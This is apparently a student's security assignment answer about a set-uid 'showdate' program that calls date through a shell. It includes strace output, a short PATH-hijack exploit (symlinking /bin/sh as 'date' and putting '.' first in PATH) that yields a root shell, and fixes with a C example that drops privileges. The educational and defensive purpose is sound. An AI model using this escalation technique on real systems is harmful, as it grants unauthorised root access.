path: root/CamilStaps-s4498062-Assignment-2/ex1/ex1.txt
a
    Using strace -feprocess ./showdate we see the following interesting calls:
        execve("/bin/sh", ["sh", "-c", "date"], [/* 37 vars */])
        execve("/bin/date", ["date"], [/* 37 vars */])

b
    $ ln -s /bin/sh date
    $ export PATH=.:$PATH
    $ ./showdate
    # id
    uid=0(root) gid=0(root) groups=0(root),27(sudo),1001(camil)

c
    - Simply don't use execve for something as simple as this.
    - The currently used system call is:
        execve("/bin/sh", ["sh", "-c", "date"], [/* 37 vars */])
      This could be changed to:
        execve("/bin/date", ...)
      A nonprivileged user cannot change /bin/date.
    - Drop privileges before calling execve.
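
Added example (not part of the original answer; the showdate source is not shown on this page): the last two fixes from (c) combined in C. The function names and the fixed PATH value are assumptions.

```c
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Permanently give up set-uid/set-gid privileges. Group first: once the
 * effective uid is no longer 0, the gid can no longer be changed. */
int drop_privileges(void)
{
    uid_t uid = getuid();
    gid_t gid = getgid();

    if (setgid(gid) != 0 || setuid(uid) != 0)
        return -1;
    /* Verify the drop: a non-root caller must not be able to get root back. */
    if (uid != 0 && setuid(0) == 0)
        return -1;
    return (geteuid() == uid && getegid() == gid) ? 0 : -1;
}

/* Run date without a shell, without PATH lookup and without the caller's
 * environment. Returns date's exit status, or -1 on error. */
int show_date(void)
{
    char *const argv[] = { "date", NULL };
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL }; /* assumed fixed env */
    int status;
    pid_t pid = fork();

    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (drop_privileges() != 0)
            _exit(126);                  /* refuse to run date while privileged */
        execve("/bin/date", argv, envp); /* absolute path: "." in PATH is never consulted */
        _exit(127);                      /* only reached if execve failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    int rc = show_date();
    if (rc != 0)
        fprintf(stderr, "showdate: date failed (%d)\n", rc);
    return rc == 0 ? 0 : 1;
}
```

With this version the symlink from (b) is never executed, and even a replaced /bin/date would run with the caller's own uid and gid.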